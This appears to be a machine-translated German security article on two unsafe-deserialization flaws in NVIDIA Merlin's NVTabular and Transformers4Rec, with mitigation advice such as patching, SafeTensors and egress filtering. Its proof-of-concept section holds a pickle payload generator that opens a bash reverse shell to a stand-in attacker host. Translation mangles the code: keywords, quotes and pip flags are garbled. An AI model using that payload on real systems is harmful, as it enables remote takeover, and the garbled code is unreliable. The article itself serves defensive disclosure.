Die KI-Infrastrukturlandschaft steht vor einer großen Sicherheitsherausforderung. NVIDIA Merlin, der Industriestandard für den Aufbau leistungsfähiger Empfehlungssysteme in großem Maßstab, enthält zwei kritische Punkte Entfernte Code-Ausführung (RCE) Schwachstellen.
Verfolgt als CVE-2025-33214 und CVE-2025-33213Diese Mängel liegen in der NVTabellen und Transformers4Rec Bibliotheken. Sie rühren von einer grundlegenden Schwäche in der Datenverarbeitung von Python her: Unsichere Deserialisierung (CWE-502).
Angreifer können diese Schwachstellen ausnutzen, um GPU-Cluster zu kompromittieren, KI-Modelle zu vergiften oder geschützte Datensätze zu exfiltrieren, indem sie ein System dazu bringen, eine bösartige Konfigurationsdatei oder einen Modellprüfpunkt zu laden. In diesem Artikel werden der Mechanismus der Schwachstelle, die Auswirkungen auf MLOps-Pipelines und eine obligatorische Patch-Strategie beschrieben.

Die Anfälligkeitsmatrix: Was ist betroffen?
Die Schwachstellen betreffen die Art und Weise, wie Merlin-Komponenten mit der Serialisierung von Daten umgehen - insbesondere die Verwendung des Essiggurke Modul beim Laden von Artefakten von der Festplatte.
| Komponente | CVE-ID | Schwachstelle Typ | Schweregrad | Betroffene Funktionalitäten |
|---|---|---|---|---|
| NVTabellen | CVE-2025-33214 | Unsichere Deserialisierung | Kritisch | Laden gespeicherter Workflow-Objekte über Workflow.load() |
| Transformers4Rec | CVE-2025-33213 | Unsichere Deserialisierung | Kritisch | Laden von Modellprüfpunkten und Trainingskonfigurationen |
Beide Schwachstellen haben eine CVSS-Punktzahl, die in der Nähe von 9.8Das bedeutet, dass sie aus der Ferne (wenn die Dateiquelle aus der Ferne stammt) oder lokal ausgenutzt werden können, keine Authentifizierung erfordern und zu einer vollständigen Kompromittierung des Systems führen.
Technische Anatomie: Wenn Beizen zum Gift wird
Zu verstehen warum Da diese CVEs so gefährlich sind, müssen wir den zugrunde liegenden Mechanismus des Angriffs analysieren: Pythons Essiggurke Serialisierungsformat.
Das "Pickle"-Problem

Im Gegensatz zu JSON oder CSV, die reine Datenformate sind, Essiggurke ist eine Stack-basierte virtuelle Maschine. Sie speichert nicht nur Daten, sondern auch Anweisungen, wie Python-Objekte zu rekonstruieren sind.
Die Schwachstelle liegt in der __reduzieren__ Methode. Wenn Python ein Objekt entpickelt, definiert dieses Objekt __reduzieren__wird Python die von dieser Methode zurückgegebene Callable ausführen. Diese Funktion, die für die legitime Rekonstruktion von Objekten gedacht ist, ermöglicht Angreifern die Einbettung von beliebigem Bytecode.
Exploit-Code-Analyse (konzeptioneller PoC)
⚠️ Haftungsausschluss: Der folgende Code ist nur für Bildungs- und defensive Testzwecke gedacht.
Im Kontext der NVTabellenkönnte ein Angreifer eine bösartige Arbeitsablauf Verzeichnis. Wenn ein Datenwissenschaftler oder eine automatisierte MLOps-Pipeline diesen Workflow lädt, um ETL-Vorgänge durchzuführen, wird die Nutzlast ausgelöst.
So sieht ein waffenfähiger Nutzlastgenerator aus:
Python
pickle importieren os importieren
class MaliciousArtifact(object): def reduzieren.(selbst): # Die Nutzlast: Dieser Befehl wird sofort nach der Deserialisierung ausgeführt. # Bei einem echten Angriff wäre dies eine Reverse Shell oder ein C2-Beacon. cmd = "bash -c 'bash -i >& /dev/tcp/attacker-ip/4444 0>&1′" return (os.system, (cmd,))
Erzeugen Sie das Gift
Dies simuliert eine gefährdete Modelldatei oder Workflow-Konfiguration
exploit_data = pickle.dumps(MaliciousArtifact())
Der Auslöser
Innerhalb von NVTabular oder Transformers4Rec läuft ein ähnlicher Code wie dieser:
Der Inhalt der Datei wird vor der Ausführung nicht überprüft.
pickle.loads(exploit_data)`
Der Transformers4Rec-Vektor
Für Transformers4Rec (CVE-2025-33213), ist das Risiko oft in PyTorch-Modelldateien versteckt (.pt oder .bin). Da die Standard-Speichermechanismen von PyTorch Essiggurke Standardmäßig kann jedes vorab trainierte Modell, das aus einer nicht vertrauenswürdigen Quelle heruntergeladen wurde (z. B. aus einem kompromittierten Hugging Face Repository), als Trojanisches Pferd dienen.
Analyse der Auswirkungen: Die Kosten der Kompromittierung
Warum sollten sich CISOs und technische Leiter dafür interessieren? Weil Merlin-Pipelines auf hochwertiger Infrastruktur laufen.
A. GPU Cluster Hijacking (Kryptojacking)
Merlin ist für NVIDIA A100/H100 GPUs konzipiert. Dies sind die begehrtesten Ressourcen für das Mining von Kryptowährungen. Ein RCE ermöglicht es Angreifern, unbemerkt Miner zu installieren, die Unternehmen täglich Tausende von Dollar an Cloud-Computing-Gebühren kosten.
B. Vergiftung der Lieferkette
Wenn ein Angreifer die Trainingspipeline über NVTabular (ETL-Phase) kompromittiert, kann er die Eingabedaten auf subtile Weise verändern.
- Ergebnis: Das Modell lernt versteckte Vorurteile oder Hintertüren (z. B. "Empfehle immer dieses bestimmte Produkt" oder "Ignoriere Betrugsmarkierungen für diese Benutzerkennung").
C. Seitliche Bewegung
KI-Trainingscluster haben oft privilegierten Zugang zu Data Lakes (S3, Snowflake) und internen Code-Repositories. Ein kompromittierter Knoten dient als perfekter Ansatzpunkt, um tiefer in das Unternehmensnetzwerk einzudringen.
Strategie zur Behebung von Mängeln: Absicherung der KI-Pipeline
NVIDIA hat zwar Patches veröffentlicht, aber eine echte Lösung erfordert eine Änderung der Art und Weise, wie Ihr Unternehmen mit KI-Artefakten umgeht.
Phase 1: Sofortiges Flicken (die "Stoppen der Blutung"-Phase)
Überprüfen Sie Ihre aktuellen Versionen und aktualisieren Sie sofort mit pip oder conda.
Bash
# Update von NVTabular auf die gepatchte Version pip install -upgrade nvtabular
Aktualisieren Sie Transformers4Rec auf die gepatchte Version
pip install -upgrade transformers4rec`
Verifizierung:
Überprüfen Sie nach der Installation die Versionsnummern anhand des NVIDIA-Sicherheitsbulletins, um sicherzustellen, dass Sie eine Version vom Dezember 2025 oder später verwenden.
Phase 2: Architektonische Absicherung (die "Zero Trust"-Phase)
1. Umstellung auf SafeTensors
Die Industrie bewegt sich weg von Pickle. SafeTensors ist ein neues Serialisierungsformat, das von Hugging Face entwickelt wurde und von Haus aus sicher ist. Es speichert Tensoren als reine Daten, was die Ausführung von Code während des Ladens unmöglich macht.
Beispiel für eine Code-Migration:
Python
# ❌ VULNERABLE (Legacy PyTorch/Pickle) torch.save(model.state_dict(), "model.pt") model.load_state_dict(torch.load("model.pt“))
SECURE (SafeTensors)
from safetensors.torch import save_file, load_file
save_file(model.state_dict(), "model.safetensors") load_file(model, "model.safetensors")`
2. Modell-Scanning implementieren
Integrieren Sie einen Scanner in Ihre CI/CD-Pipeline oder Model Registry. Tools wie Picklescan kann analysieren .pkl, .ptund .bin Dateien auf verdächtige Bytecode-Signaturen, bevor sie geladen werden dürfen.
3. Netzsegmentierung (Egress-Filterung)
Ihre Schulungsräume sollten keinen ungehinderten Internetzugang haben.
- Block: Standardmäßig der gesamte ausgehende Verkehr.
- Erlauben Sie: Nur bestimmte, vertrauenswürdige Domänen (z. B. interne PyPI-Spiegel, bestimmte S3-Buckets).
- Warum? Dadurch wird verhindert, dass eine Reverse Shell (wie die im obigen PoC) eine Verbindung zurück zum Command & Control-Server des Angreifers herstellen kann.
Schlussfolgerung
Die Offenlegung von CVE-2025-33214 und CVE-2025-33213 ist ein Weckruf für die KI-Branche. Wir können Modelldateien und Daten-Workflows nicht länger als harmlose statische Assets behandeln; sie sind ausführbarer Code.
Da KI immer stärker in kritische Geschäftsabläufe integriert wird, ist die Sicherung der MLOps-Pipeline genauso wichtig wie die Sicherung der Webanwendung selbst.
Aktionsplan für heute:
- Prüfung: ausführen.
Pip-Listeauf allen Trainingscontainern. - Aufnäher: Setzen Sie die neuesten NVIDIA Merlin Versionen ein.
- Umgestalten: Beginnen Sie mit der Roadmap zur Ersetzung von Pickle durch SafeTensors.

